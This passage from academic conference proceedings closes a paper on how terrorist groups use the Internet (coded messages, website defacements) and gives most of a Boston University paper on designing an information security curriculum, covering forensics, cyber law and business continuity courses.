other eighteen terrorists who carried out the attacks of 9/11 is reported to have read: “The semester<br />

begins in three more weeks. We’ve obtained 19 confirmations for studies in the faculty of law, the<br />

faculty of urban planning, the faculty of fine arts, and the faculty of engineering.” The reference to the<br />

various faculties is code for the buildings targeted in the attacks (Weimann 2005).<br />

Defacing websites are a popular way for terrorist groups to demonstrate its technical capability and<br />

create fear. These defacements often take the form of public alterations of a website that are visible to<br />

a large audience. An example of such an attack took place in 2001, when a group known as the<br />

Pentaguard defaced a multitude of government and military websites in the UK, Australia, and the<br />

United States. “This attack was later evaluated as one of the largest, most systematic defacements of<br />

worldwide government servers on the Web”. Another example is pro-Palestinian hackers using a<br />

coordinated attack to break into 80 Israel-related sites and deface them, and when al Qaeda<br />

deposited images of the murdered Paul Marshall Johnson, Jr. on the hacked website of the Silicon<br />

Valley Landsurveying, Inc (Brunst 2010).<br />

266


4. Conclusion<br />

Namosha Veerasamy and Marthie Grobler<br />

The use of the Internet by terrorist groups has expanded to both traditional Internet usage and the<br />

more innovative usage of both traditional and new Internet functions. Global terrorist groups can now<br />

electronically target an enormous amount of potential recipients, recruitees and enemies. Terrorist<br />

groups often embrace the opportunities that technology innovation brings about in order to advance<br />

their own terrorist workings.<br />

This paper is informative in nature, aiming to make the public aware of the potential that ICT<br />

infrastructure has in assisting terrorist groups in their operations and normal functions. These<br />

functions include all the processes from recruitment and training of new members, communicating<br />

with existing members, planning and executing operations, distributing propaganda, fund raising and<br />

carrying out psychological warfare. Due to the unique nature of the Internet, many of these traditional<br />

and innovative Internet uses can be carried out in either a uni-directional or bi-directional fashion,<br />

depending on the nature of the communication required.<br />

Based on this research, in can be seen that international terrorist groups can use the Internet in most<br />

of its daily functions to facilitate the growth and operation of the groups. In a sense, terrorist groups<br />

can actively exploit the existing ICT infrastructure to advance their groups. This paper discussed<br />

specific instances and provided examples of this exploitation through web literature use, socialnetworking<br />

tools, anti-forensic techniques and novel fundraising methods. In conclusion, further<br />

research may be done to identify ways on how these innovative uses of the Internet can be used to<br />

counter terrorism attacks, and not only support their activities.<br />

References<br />

Atwan, A. (2006), The secret history of al Qaeda, 1st edn, University of California Press, California.<br />

Bass, R. & Ho, S.M. 2007, AP: 1M archived pages removed post-9/11.<br />

Brachman, J.M. (2006), "High-tech terror: Al-Qaeda's use of new technology", Fletcher Forum of World Affairs,<br />

vol. 30, pp. 149.<br />

Brunst, P.W. (2010), "Terrorism and the Internet: New Threats Posed by Cyberterrorism and Terrorist Use of the<br />

Internet" in , ed. P.W. Brunst, Springer, A war on terror?, pp. 51-78.<br />

Carr, J. (2007), Anti-Forensic Methods Used by Jihadist Web Sites.<br />

Coll, S. & Glasser, S.B. (2005), "Terrorists turn to the Web as base of operations", The Washington Post, vol. 7,<br />

pp. 77–87.<br />

Conway, M. (2006), "Terrorist Use' of the Internet and Fighting Back", Information and Security, vol. 19, pp. 9.<br />

Dizard, W.P. (2006), Internet "cloaking" emerges as new Web security threat, Government Computer News.<br />

Goodman, S.E., Kirk, J.C. & Kirk, M.H. (2007), "Cyberspace as a medium for terrorists", Technological<br />

Forecasting and Social Change, vol. 74, no. 2, pp. 193-210.<br />

Internet World Stats 2010, May 27, 2010-last update, Internet usage statistics - The internet big picture: World<br />

internet users and population stats. Available: http://www.internetworldstats.com/stats.htm [2010, 06/08] .<br />

Jacobson, M. (2009), "Terrorist financing on the internet", CTC Sentinel, vol. 2, no. 6, pp. 17-20.<br />

Jamestown Foundation, (2006), Next Stage in Counter-Terrorism: Jihadi Radicalization on the Web.<br />

Kimmage, D. & Ridolfo, K. (2007), "Iraqi Insurgent Media. The War of Images and Ideas. How Sunni Insurgents<br />

in Iraq and Their Supporters Worldwide are Using the Media", Washington, Radio Free Europe/Radio<br />

Liberty.<br />

Labi, N. (2006), "Jihad 2.0", The Atlantic Monthly, vol. 102.<br />

Lachow, I. & Richardson, C. (2007), "Terrorist use of the Internet: The real story", Joint Force Quarterly, vol. 45,<br />

pp. 100.<br />

Lau, S. (2003), " An analysis of terrorist groups' potential use of electronic steganography ", Bethesda, Md.:<br />

SANS Institute, February, , pp. 1-13.<br />

Noguchi, Y. & Goo, S. (2006), Terrorists’ Web Chatter Shows Concern About Internet Privacy, Wash.<br />

Nordeste, B. & Carment, D. (2006), " Trends in terrorism series: A framework for understanding terrorist use of<br />

the internet ", ITAC, vol. 2006-2, pp. 1-21.<br />

Piper, P. (2008), Nets of terror: Terrorist activity on the internet. Searcher, vol.16, issue 10.<br />

Tibbetts, P.S. (2002), "Terrorist Use of the Internet and Related Information Technologies", Army Command And<br />

General Staff Coll Fort Leavenworth Ks School Of Advanced Military Studies, pp. 1-67.<br />

Weimann, G. (2009), "Virtual Terrorism: How Modern Terrorists Use the Internet", Annual Meeting of the<br />

International Communciation Association, Dresden International Congress Centre, Dresden.<br />

Weimann, G. (2005), "How modern terrorism uses the internet", The Journal of International Security Affairs, vol.<br />

Spring 2005, no. 8.<br />

West, D. & Latham, C.( 2010), "The extremist Edition of Social Networking: The Inevitable Marriage of Cyber<br />

Jihad and Web 2.0", Proceedings of the 5th International <strong>Conference</strong> on Information Warfare and Security,<br />

ed. L. Armistead, <strong>Academic</strong> <strong>Conference</strong>s, .<br />

Whelpton, J. (2009), "Psychology of Cyber Terrorism" in Cyberterrorism 2009 Seminar Ekwinox, South Africa.<br />

267


Evolving an Information Security Curriculum: New<br />

Content, Innovative Pedagogy and Flexible Delivery<br />

Formats<br />

Tanya Zlateva, Virginia Greiman, Lou Chitkushev and Kip Becker<br />

Boston University, USA<br />

zlateva@bu.edu<br />

ggreiman@bu.edu<br />

ltc@bu.edu<br />

kbecker@bu.edu<br />

Abstract: In the last ten years information security has been recognized as a most relevant new trend by<br />

academia, government and industry. The need for educating information security professionals has increased<br />

dramatically and is not being met despite recent growth of cyber security programs. The challenge is to design<br />

and evolve multi-disciplinary curricula that provide theoretical as well as hands-on experience and are also<br />

available to a broad student audience is of strategic importance for the future of reliable and secure systems. We<br />

present our experience in designing and evolving information security programs that have grown to over 650<br />

students per year since their inception eight years ago and have graduated more than 250 students. We discuss<br />

three major directions in the evolution of the program: the increased focus of the core and growth of<br />

concentration electives, the design of cyber law curriculum and coordination with the business continuity<br />

programs, and the introduction of new educational technologies such as virtualization and video-collaboration<br />

and flexible online and blended delivery formats. The rapid growth of the program, the changes in the discipline<br />

and the great diversity of professional interests of our students required broadening of the curriculum with<br />

courses and modules on emerging technologies such as digital forensics, biometrics, security policies and<br />

procedures, privacy and security in health care, cyber law, as well as the coordination of the curriculum with<br />

existing programs in business continuity. Special efforts were expended to the introduction of more participatory<br />

pedagogy, more specifically by developing a series of virtual laboratories that brought real world situations into<br />

the class room and through video-collaboration tools that encourage team building. The accessibility of the<br />

programs was increased through the introduction of flexible delivery formats. After establishing the programs in<br />

the traditional classroom, we added an blended and online version that rapidly found a national audience.<br />

Keywords: information security education, digital forensics, cyber law, virtualization, business continuity, online<br />

and blended learning<br />

1. Introduction<br />

The strong and steadily increasing reliance on a globally distributed computational infrastructure in<br />

virtually all areas of human endeavor—business , industry, government, defense, health care, and<br />

even the individual’s social interactions—has made security and reliability of vital importance and has<br />

sharply increased the need for information security professionals. This need is not being met despite<br />

the recent growth of cyber security programs. The reasons lie in the complexity of the task that<br />

requires building an interdisciplinary curriculum that integrates knowledge domains as diverse<br />

cryptography, ethics, engineering, management and law. An additional challenge is the unusually<br />

large gap between theory, (e.g. cryptographic algorithms), and practical skills, (e.g. setting up a fire<br />

wall), that calls for an imaginative and effective way to bring real world experience into the classroom.<br />

This paper presents and discusses our experience in establishing and growing the information<br />

security concentrations in the Master’s programs in Computer Science, Computer Information<br />

Systems, and Telecommunication at Boston University that are offered through BU’s Metropolitan<br />

College. The programs are certified by the Committee on National Security Systems. Since the<br />

introduction of the security curriculum in 2002 enrollments in our security courses grew to over 650<br />

per year and more than 250 students have completed their Master’s degree with a concentration in<br />

security. We trace the evolution of the programs in three major directions: the broadening and<br />

diversification of the curriculum, developing a cyber law course and coordinating the curriculum with<br />

programs in business continuity , and introducing new educational technologies, (more specifically<br />

virtualization and video-collaboration), and flexible online and blended delivery formats.<br />

2. Design principles, structure, and initial curriculum<br />

We started introducing information security themes in the curriculum in the late 1990-ies and formally<br />

introduced an information security concentration in the Master’s programs of Computer Science,<br />

268


Tanya Zlateva et al.<br />

Computer Information Systems and Telecommunication in 2002. The central goal of the program was<br />

to draw upon the resources of a large research university and to give students the academic<br />

knowledge and technical skills as well as to develop their ability to identify and solve security<br />

problems in their multi-disciplinary complexity taking into account technical, managerial, legal, and<br />

ethical aspects of information security. We emphasized from the outset an interdisciplinary design<br />

approach with strong laboratory and experiential components; a program scope that embraces<br />

contributions from multiple fields; and a program structure that integrates information assurance<br />

concepts, topics, and methods throughout the curriculum as opposed to predominantly in specialized<br />

courses (Zlateva et al., 2003). The integration of information assurance topics across the curriculum is<br />

conducted at three levels (Table 1):<br />

First, the fundamental information assurance topics are taught within the existing core courses at<br />

the undergraduate and graduate level. This ensures that all students are equipped with the basic<br />

knowledge of information security that is currently indispensable for any professional working in<br />

computer software, hardware, systems, or networks.<br />

Second, specialized semester long courses—such as information security, network security,<br />

database security, cryptography, biometrics, digital forensics, etc. —provide in-depth analysis of<br />

different security aspects. These courses provide the core for concentrators in information<br />

security and are available as electives to students outside the information security concentration.<br />

Third, advanced specialized courses—such as web applications, web services, enterprise<br />

computing, mobile applications, data mining etc. —include cyber security topics and modules.<br />

Our Master’s programs consists of ten four-credit courses and a concentration requires the<br />

completion of four courses, typically three specialized that provide depth and one related high level<br />

elective for breadth. When first introduced in 2002 the security concentrations in the MS in CS, CIS,<br />

and TC were based on five specialized courses— cryptography, computer networks and security,<br />

information systems security, database security, and network management and computer security<br />

(Table 1).<br />

The programs were well received and grew rapidly. From a curriculum point of view we soon<br />

recognized two related trends both of which required the introduction of new security topics and<br />

further development of the curriculum both in depth and breadth. From the point of view of pedagogy<br />

and access it became clear that novel online technologies such as virtualization and videocollaboration<br />

can increase the impact of content presentation and that new delivery formats, such as<br />

hybrid or distance learning, can make the program available to students at remote locations or who<br />

are unable to attend on-campus classes due to demanding work schedules. In the following we first<br />

discuss the evolution of the curriculum and then the novel teaching approaches.<br />

The large majority of students in our programs are information technology professionals and a<br />

considerable number are already involved in information security. From the very beginning of the<br />

programs their interests ranged from biometrics to digital forensics on the technical side, and from<br />

security policies to legal and regulatory issues on the managerial and organizational side. At the same<br />

time the information security field was rapidly evolving, maturing, and its importance was becoming<br />

widely recognized. Both these factors required us to deepen the theoretical and applied knowledge of<br />

the core, to updated and broaden the curriculum with topics and/or courses on emerging<br />

technologies, and to seek synergies with programs that focus on related and complementary fields.<br />

Depth was achieved by restructuring the teaching of security fundamentals and adding a course on<br />

network security in recognition of the central importance that global networks play in the modern<br />

world. Breadth was achieved by introducing a four-course certificate in digital forensics, a new course<br />

in biometrics and a number of specialized content modules in the advanced courses. In collaboration<br />

with the administrative sciences department we are currently exploring synergies with the<br />

concentration in Business Continuity, Security, and Risk Management and the introduction of new<br />

course on cyber law.<br />

269


Tanya Zlateva et al.<br />

Table 1: Structure and evolution of the security curriculum (the middle box shows the initial<br />

concentration courses on the right and the new courses are on the left, courses that are<br />

currently offered are in italics)<br />

Information security modules in core undergraduate and graduate courses<br />

(intro programming and data structures, operating systems, data communications and networks,<br />

databases, algorithms, software engineering)<br />

Information Security Concentration Courses<br />

Computer and Network Security<br />

(CS654)<br />

Information Systems Security (CS684)<br />

Database Security (CS674)<br />

Cryptography (CS786)<br />

Network Management and Computer<br />

Security (TC685)<br />

Enterprise Information Security (CS695)<br />

Network Security (CS690)<br />

IT Security Policies and Procedures (CS684)<br />

Electives<br />

3. Evolving the information security curriculum<br />

Advanced Cryptography (CS799)<br />

Biometrics (CS599)<br />

Digital Forensics and Investigations (CS693)<br />

Network Forensics (CS703)<br />

Advanced Digital Forensics (CS713)<br />

1. Network Performance and Management<br />

(CS685)<br />

Information security modules in high-level courses (web application development, web services,<br />

enterprise computing, mobile applications, data mining, biomedical information technology,<br />

electronic health records)<br />

3.1 Focusing and expanding the concentration courses<br />

Initially we provided the security fundamentals in a single course that came in two flavors—a<br />

Computer and Network Security course for the MS in CS and CIS programs and a Network<br />

Management and Computer Security course tailored to the needs of the telecommunication program.<br />

Two years into the program this structure became insufficient for accommodating the growing body of<br />

knowledge in security models and protocols and especially in network security. We restructured the<br />

curriculum by consolidating enterprise security topics into a single course required for all<br />

concentrations and dedicating a full course on network security. The Network Management and<br />

Computer Security course of the telecommunication degree was revised to a Network Performance<br />

and Management which retained an emphasis on security and was moved into the core. (Table 1<br />

shows the evolution of the curriculum and the program and course descriptions are available at the<br />

web site of Boston University (2010a).<br />

The new Enterprise Information Security course lays a solid academic basis for the understanding of<br />

security issues in computer systems, networks, and applications. It discusses formal security models<br />

and their application in operating systems; application level security with focus on language level<br />

270


Tanya Zlateva et al.<br />

security and various security policies; introduction to conventional and public keys encryption,<br />

authentication, message digest and digital signatures, and an overview of Internet and intranet topics.<br />

The Network Security course expands on the fundamentals (security services, access controls,<br />

vulnerabilities, threats and risk, network architectures and attacks) through a discussion on network<br />

security capabilities and mechanisms (access control on wire-line and wireless networks), IPsec,<br />

firewalls, deep packet inspection and transport security. It then addresses network application security<br />

(email, ad-hoc, XML/SAML and Services Oriented Architecture security).<br />

A new course on IT Security Policies and Procedures evolved from and replaced the Information<br />

System Security course by shifting the focus to methodologies for identifying, quantifying, mitigating<br />

and controlling security risks, the development of IT risk management plans, standards, and<br />

procedures that identify alternate sites for processing mission-critical applications, and techniques to<br />

recover infrastructure, systems, networks, data and user access.<br />

3.2 Adding security electives<br />

Elective courses on specialized security topics were added based on student interests and emerging<br />

technologies. In response to an early and sustained interest in digital forensics we developed first a<br />

course and then a Graduate Certificate in Digital Forensics (Boston University 2010a) that can be<br />

taken as a stand-alone or as part of the MS degree. The certificate consists of a required Business<br />

Data and Communication Network course and three forensics courses that build on each other:<br />

Digital Forensics and Investigations (CS693) introduces the investigative process, available<br />

hardware and software tools, digital evidence controls, data acquisition, computer forensic<br />

analysis, e-mail investigations, image file recovery, investigative report writing, and expert witness<br />

requirements.<br />

Network Forensics (CS703) explores the relationship between network forensic analysis and<br />

network security technologies, identification of network security incidents and potential sources of<br />

digital evidence, basic network data acquisition and analysis.<br />

Advanced Digital Forensics (CS713) discusses malicious software, reverse engineering<br />

techniques for conducting static and dynamic forensic analysis on computer systems and<br />

networks, legal considerations, digital evidence controls, and documentation of forensic<br />

procedures.<br />

A Biometrics (CS599) course was developed in response to increased significance of biometrics<br />

approaches and their integration in traditional security schemes. The course presents fundamental<br />

methods for designing applications based on various biometrics, (fingerprints, voice, face, hand<br />

geometry, palm print, iris, retina), multimodal approaches, privacy aspect relating to using of<br />

biometrics data, and system performance issues.<br />

Based on industry demand from high-tech Boston area companies we developed an Advanced<br />

Cryptography (CS713) elective course that expanded the coverage of cryptographic algorithms to<br />

include elliptic curves, block ciphers, the data encryption standard (DES) and double and triple DES,<br />

the advanced encryption standard (AES), cryptographic hash functions (SHA-512 and WHIRLPOOL),<br />

and key management issues<br />

In addition to these new courses we developed security modules in the high level elective including<br />

web application development, web services, enterprise computing, mobile applications, data mining,<br />

and most recently in the courses on biomedical information technology and electronic health records<br />

of our new concentration in Health Informatics.<br />

4. Relating technological aspects to cyber law and business continuity<br />

The importance of protecting information for achieving business success has always been recognized<br />

by the business community but it has reached a new dimension since cyberspace became the<br />

preferred medium for business transactions. Expenses for information security systems continue to<br />

grow and it has been found that quality of information security impacts the financial value of<br />

companies. According to McAfee (2006) United States companies spend as much on information<br />

technology annually as they do on offices, warehouses and factories combined and these<br />

expenditures tend to increase. According to Cavusoglu et al. (2004) firms that experienced internet<br />

271


Tanya Zlateva et al.<br />

security breaches lose an average of 2.1% of their market value within two days and subsequent<br />

studies confirmed the sensitivity of financial performance from security breaches.<br />

The threat of cyber espionage and cyber war is not anymore restricted to expert forums but has<br />

become part of the public discussion. The increased number and sophistication of cyber-attacks<br />

clearly indicate that these attacks originate from professionally run business and government<br />

organizations. Estimates about the degree of the threat may vary—Clarke (2010) posits that cyber<br />

armies are being set up in Russia, China Israel, North Korea and Iran while others believe the goal is<br />

espionage not cyber . However, no one disputes the large negative impact an information security<br />

breach can cause to the economy, government, or the individual.<br />

These development trends clearly indicate that cyber law, business continuity and risk management<br />

provide an indispensable context for framing information security problems and are an integral part of<br />

finding effective solutions. A collaborative effort between the BU MET Computer Science and<br />

Administrative Sciences Department is currently under way for developing a new course in cyber law<br />

and for coordinating the curriculum of the information security concentrations in the MS program in<br />

CS, CIS, and TC with an existing graduate certificate and specialization in Business Continuity,<br />

Security and Risk Management (Boston University 2010b).<br />

4.1 Law and regulation of information security<br />

As technology evolves so must the law. The alleged obsolescence of legal rules in computers and the<br />

Internet among other technologically advanced fields is well recognized in legal scholarship (Moses<br />

2007; Downing 2005). Because the resolution of legal problems are typically left to the chosen dispute<br />

resolution bodies, it is most important to identify in advance the types of legal problems that frequently<br />

follow technological change (Moses 2007; Lessig 1995). Some of the more important questions<br />

arising in relation to information security include:<br />

Defining the technological advancements needed to secure greater protections to the citizens and<br />

communities from cyber-attacks;<br />

Determining who can best regulate the Internet environment and control activity in cyberspace in<br />

a sovereign world;<br />

Constructing with law enforcement and the intelligence communities, an effective means of<br />

sharing actionable information with the private sector (Chander 2002);<br />

Establishing an ethics and conflict policy governing cyber activity and information security to<br />

address cultural change; and<br />

Understanding the ways in which the rise of online interaction alters the balance of power among<br />

individuals, corporations, and government, and how our choice of legal regime should be<br />

influenced by these changes (Chander 2002).<br />

We approach the development of the new information security course by framing a course<br />

methodology and structuring the topics around the areas of the global regulatory environment,<br />

computer crime regulations in the US, jurisprudence over cyber space, culture and information<br />

security, cyber forensics and internet evidence, and international responsibility.<br />

Framing an Information Security Law Curriculum Methodology.<br />

Significantly, the global economy has expanded our vulnerability to manipulation of our software and<br />

hardware through a new phenomena known as "the global supply chain" which increases the number<br />

of actors and the complexity of understanding the legal environment from both a domestic and global<br />

perspective. Technology today passes through many hands including design, manufacture,<br />

distribution, transportation, wholesaler, retailer, installer, repair service and firmware update. To<br />

prevent these vulnerabilities we must focus on better system design, supply chain management,<br />

information security practices, public private partnerships, law enforcement, intelligence and most<br />

important the education of users, employees and management.<br />

The primary pedagogical approach to teaching security information law at Boston University is<br />

through the Socratic method. Diverse Socratic methodologies are used to develop critical thinking<br />

skills including inquiry and debate, examination of complex real-life cybersecurity problems and<br />

ethical concerns, and conflict and contractual analysis, The case studies are derived primarily from<br />

272


Tanya Zlateva et al.<br />

court opinions both domestic and foreign, and are used to provoke discussion, develop problem<br />

solving skills, introduce the importance of team work and assist in attitudinal development. The goal is<br />

to extract and apply important principles of law as well as practical knowledge needed to prevent,<br />

track and enforce cybersecurity laws across jurisdictions. A critical component of the course is the<br />

development of a research project by the students that will highlight emerging topics which will draw<br />

not only upon class discussions but will require the development of a proposal that will advance<br />

innovation and improvement in our current technological and legal structures to combat breaches of<br />

cybersecurity.<br />

The curriculum allows students to progress from a basic understanding of the complex legal system<br />

governing cybersecurity to an overview of the methodologies, technological forensics and<br />

enforcement tools that governments need to fight cybersecurity violations both domestically and<br />

globally. The module includes analyzing legal authorities and boundaries in engaging adversarial<br />

cyber activitities, examining cybersecurity forensics and issues in global prosecution and<br />

enforcement, understanding the advantages and the limitations of private v. public regulation in the<br />

cybersecurity field and identifying ethical, political and cultural concerns in the legal systems of<br />

various countries and developing recommendations for the improvement and harmonization of global<br />

cybersecurity legal systems. A few examples of the key topics incorporated into the module include:<br />

the ability of law enforcement to access stored communications controlled by a third party such as a<br />

service provider or an employer; whether an interception can include acquisition of stored<br />

communications; the definition of electronic storage; the use of surveillance in national security<br />

investigations; the application of the federal Computer Fraud and Abuse Act (CFAA) extraterritorially;<br />

the collection of data from online transactions; the admissibility of electronic evidence; expedited<br />

preservation of computer data; and cross border searches and seizures.<br />

The above topics are of immediate significance for all industries, government academia as internet<br />

technologies have become an operational standard in our professional and private life. Knowledge of<br />

the essentials of information security law is an important requirement for all students today to be<br />

effective and successful in their chosen professions. Teaching security information law is about<br />

awareness, prevention and understanding the risks inherent in cyber attacks and cyberterrorism as<br />

illustrated recently by the denial of access by the U.S. Military Organizations to websites carrying<br />

classified documents released by Wikileaks and leading news organizations. Cyberspace is regulated<br />

through a complex network involving various modalities of constraint that include the legal and<br />

regulatory process, societal norms, markets such as price structures, and finally through the<br />

architecture of cyberspace, or its code (Lessig 1999; Lessig 1995; Bellia et al., 2007).<br />

The role of private entities in cyberspace as a source of regulatory control continues to create<br />

controversy. For example, domain names are controlled by a privately owned entity, the Internet<br />

Corporation for Assigned Names and Numbers (ICANN), that has been making policy for the past ten<br />

years in cooperation with the U.S. Department of Commerce (DoC) (Froomkin 2000). Important<br />

questions arise concerning government oversight and whether any constitutional norms might be<br />

applied to check the activities of these private entities, or whether oversight mechanisms could be<br />

adopted by legislatures (Bellia et al., 2007).<br />

The U.S. Government surveillance under the Wiretap Act, the Electronic Communications Privacy Act<br />

and under the Foreign Intelligence Surveillance Act (FISA) are critical topics for information security<br />

and the case law provides excellent basis for discussing the question when a particular conduct<br />

constitutes a violation of national security. Some scholars believe that all current contracts should<br />

require defense contractors to protect their IT infrastructure to allow DOD evaluation assessments of<br />

the compliance in this area. Others have suggested that Congress should enact a national defenseoriented<br />

statute that mirrors the Department of Homeland Security (DHS) statutes related to our<br />

domestic security (Brown 2009).<br />

In the leading case of Ashcroft v. ACLU, Justice Thomas concluded that website operators should be<br />

responsible for standards of conduct that exist wherever the site is accessible (Ashcroft v. ACLU<br />

2002). This is a significant decision considering that most websites have servers in many locations<br />

around the world.<br />

International Responsibility.<br />

273


Tanya Zlateva et al.<br />

In addition to our students understanding U.S. information security law, to the extent that cyber<br />

terrorists commit cross-border attacks, international law will be at the forefront of responding to these<br />

attacks (Lentz 2010). An international law duty that requires all states to prevent and respond to cyber<br />

terrorist acts has been created by the passage of the United Nations Security Council Resolution<br />

1373, which requires States among other actors to take necessary steps to prevent the commission of<br />

terrorist acts, deny safe havens to those who finance, plan, support or commit terrorist acts, ensure<br />

that any person who participates in the financing, planning, or perpetration of terrorists acts is brought<br />

to justice, and afford one another the greatest measure of assistance in connection with criminal<br />

investigation or proceedings.<br />

4.2 Business continuity, security, and risk management<br />

Business continuity traditionally focuses on the organizational processes that evaluate risks, develop<br />

plans at the strategic, tactical and operational level that ensure the uninterrupted continuation of the<br />

business process. It is a broad management domain distinct from information security but one that<br />

has substantive relationships with issues of information classification and preservation as well as the<br />

sources system vulnerabilities and threats. The specialization in Business Continuity, Security and<br />

Risk Management includes three required courses and a related elective (Boston University, 2010b).<br />

The core curriculum builds an academically solid foundation through discussions of specific industry<br />

needs. The required courses proceed from an overview of central issues and assessment approaches<br />

to details of risk planning and strategy and the development of emergency response plans as follows:<br />

Introduction to Business Continuity, Security, and Risk Management (AD610) is an overview<br />

course that examines management issues involved in assessing the security and risk<br />

environments in both the private and public sectors in order to assure continuous system-wide<br />

operations. The course studies the elements of risk assessment and operational continuity and<br />

exposes the role of the firm in crisis response and management as well as the terms, systems,<br />

and interactions necessary to assure continuous operations.<br />

System-Wide Risk Planning, Strategy, and Compliance (AD613) explores issues relating to<br />

corporate and organizational security and risk from both the perspective of systems designed to<br />

protect against disasters and aspects of emergency preparedness should systems fail. The<br />

course discusses proactive risk assessment, designing and implementing a global assurance<br />

plan, including control measures to assess the plan’s degree of success. The course also<br />

provides explanations of legal/regulatory, auditing, and industry-specific requirements related to<br />

compliance, control, and reporting issues in business risk management. The role of establishing<br />

and maintaining standards by local, national, and international agencies is discussed, as is the<br />

importance of these agencies in certifying operations.<br />

Incident Response and Disaster Recovery (AD614) builds on the concepts introduced in the<br />

previous two courses and applies them in more detail mainly to the corporate-private sector<br />

environment. The focus is on organization and processes necessary to effectively respond to and<br />

manage incidents, including the transition from emergency response and incident management to<br />

business recovery. Disaster recovery is discussed with an emphasis on technology recovery.<br />

The elective course gives students flexibility to pursue their individual interests in one of three areas:<br />

emergency management, project risk and cost management and IT security policies and procedures<br />

though the following courses:<br />

COO-Public Emergency Management (AD612) examines emergency management from national,<br />

state, local, and family perspectives of prevention, preparedness, response, and recovery. The<br />

course encompasses knowledge of the specific agencies, organizations, and individual behaviors<br />

in emergency management as well as the interlinking partnerships between these groups. Areas<br />

of discussion include: responsibilities at federal, state, community and individual levels; guidelines<br />

and procedures for operations and compliance such as the National response Plan; Incident<br />

Command Systems (ICS); plan development, command, and control; communication; partnership<br />

development and maintenance; leadership;<br />

Project Risk and Cost Management (AD644) presents approaches to managing the components<br />

of a project to assure it can be completed through both general and severe business disruptions<br />

on local, national, and international levels. Important aspects include cost management, early cost<br />

estimation, detailed cost estimation, and cost control using earned value method.<br />

IT Security Policies and Procedures (CS684) that was discussed in section 2.<br />

274


Tanya Zlateva et al.<br />

5. Pedagogy, educational technologies and flexible delivery formats<br />

The maturing of the field and the great diversity of student backgrounds naturally led to the need of<br />

more imaginative and more participatory pedagogy. We were especially concerned with teaching our<br />

students how to relate concepts from different areas and apply them on real world applications. To<br />

achieve this we developed a series of virtual laboratories that provided an environment for applying<br />

theoretical concepts, testing different approaches, and assuming alternative roles in various<br />

scenarios.<br />

(Zlateva et al., 2008, Hylkema et al, 2010). The student reflections indicate that the new technologies<br />

enhance understanding and further communication and team building.<br />

Finally we needed also to address the problem of making our programs accessible through flexible<br />

delivery formats. We have considerable experience with flexible delivery formats: first with a blend of<br />

in-class and online in 2000 (Zlateva et al., 2001), and since 2003 a fully online MS in CIS program.<br />

The online version of the security concentration was introduced in 2005. There are significant<br />

differences in the preparation and the delivery of an face-to-face and an online course. One of the<br />

most important factors for successful teaching and learning online is the ability to create a meaningful<br />

and close student-teacher and student-student interaction. Towards this goal we introduced videoconferencing<br />

tools that were used for discussion and review sessions with the instructor, and also by<br />

student teams working on a project. The feedback from students and faculty is overwhelmingly<br />

positive and we are currently developing use cases that reflect the best practices for these<br />

technologies.<br />

6. Conclusions and future work<br />

For the last eight years we developed a comprehensive curriculum for security education. The core<br />

ensures an in-depth discussion of security of operating systems, software, networks as well as<br />

security policies and procedures. This core is complemented by concentration electives in digital<br />

forensics, biometrics, advanced cryptography, and security modules in high-level courses such as<br />

web technologies, enterprise computing, data mining, health informatics. The information security<br />

programs are linked to the programs of business continuity that provide much needed management<br />

context. From a methodological point of view great care is taken to relate abstract theory to practical<br />

skills and team work by using virtual laboratories and video-collaboration tools. Overall the curriculum<br />

introduces analytical dialogue, creative concepts and critical pedagogical methodologies to advance<br />

student learning.<br />

References<br />

Ashcroft v. ACLU 542 U.S. 656 (2004).<br />

Boston University (2010a) Information Security Programs (http://www.bu.edu/csmet/academic-programs/ ) and<br />

Course Descriptions (http://www.bu.edu/csmet/academic-programs/courses/)<br />

Boston University (2010b) Business Continuity, Security and Risk Management<br />

http://www.bu.edu/online/online_programs/graduate_degree/master_management/emergency_managemen<br />

t/courses.shtml<br />

Bellia, P.L., Berman, P.S. & Post, D.G. (2007). Cyberlaw: Problems of Policy and Jurisprudence in the<br />

Information Age, 4-10, St. Paul, MN: Thompson/West.<br />

Brown, T.A. (Lt. Col.) (2009). Sovereignty in Cyberspace: Legal Propriety of Protecting Defense Industrial Base<br />

Information Infrastructure, 64 A.F.L. Rev. 21, 256-257.<br />

Cavusoglu, H., Mishra, B. and Raghunathan, S. (2004)."The effect of Internet security breach announcements on<br />

market value: capital market reactions for breached firms and Internet security developers," International<br />

Journal of Electronic Commerce, Vol. 9, Number 1, pp. 69-104.<br />

Chabinsky, S. R. (2010). Cybersecurity Strategy: A Primer for Policy Makers and Those on the Front Line, 4 J.<br />

Nat'l Security L. & Pol'y 27, 38.<br />

Chander, A. (2002). Whose Republic? 69 U. Chi. L. Rev. 1479.<br />

Clarke, R.A. (2010). Cyber War, New York: Harper Collins.<br />

Cohen, A. (2010). Cyberterrorism: Are we Legally Ready? 9 J. Int'l bus. & L. 1, 40.<br />

Downing ,R. W. (2005). Shoring up the Weakest Link: What Lawmakers Around the World Need to Consider in<br />

Developing Comprehensive Laws to Combat Cybercrime, 43 Colum. J. Transnat’l L. 705, 716-19.<br />

Hylkema, M., Zlateva, T., Burstein, L. and Scheffler, P (2010). Virtual Laboratories for Learning Real World<br />

Security - Operating Systems. Proc. 14th Colloquium for Information Systems Security Education,<br />

Baltimore, MD June 7 – 9.<br />

Kerr, O.S. (2003). Cybercrime's Scope: Interpreting 'Access' and 'Authorization' in Computer Misuse Statutes, 78<br />

NYU Law Review No. 5, 1596, 1621 (citing various state and federal statutes defining "access").<br />

Lentz, C.I. (2010). A State's Duty to Prevent and Respond to Cyberterrorist Acts, 10 Chi. J. Int'l L. 799, 822-823.<br />

275


Tanya Zlateva et al.<br />

Lessig, L. (1995). The Path of Cyberlaw, 104 Yale L.J. 1743, 1743-45.<br />

Lessig, L. (1999). The Law of the Horse: What Cyberlaw Might Teach, 113 Harv. L. Rev. 501, 509.<br />

Moses, L.B. (2007). Recurring Dilemmas: The Law’s Race to Keep Up With Technological Change, University of<br />

Illinois Journal of Law, Technology & Policy, The Board of Trustees of the University of Illinois, 7 U. Ill. J.L.<br />

Tech. & Policy 239, 241-243.<br />

Zlateva, T., Burstein, L., Temkin, A., MacNeil, A. and Chitkushev, L. (2008): Virtual Laboratories for Learning<br />

Real World Security. Proceedings of the Colloquium for Information Systems Security Education, Society for<br />

Advancing Information Assurance and Infrastructure Protection, Dallas, Texas, June 2-4, 2008.<br />

Zlateva, S.; Kanabar, V. , Temkin, A. , Chitkushev, L. and Kalathur, S. (2003): Integrated Curricula for Computer<br />

and Network Security Education, Proceedings of the Colloquium for Information Systems Security<br />

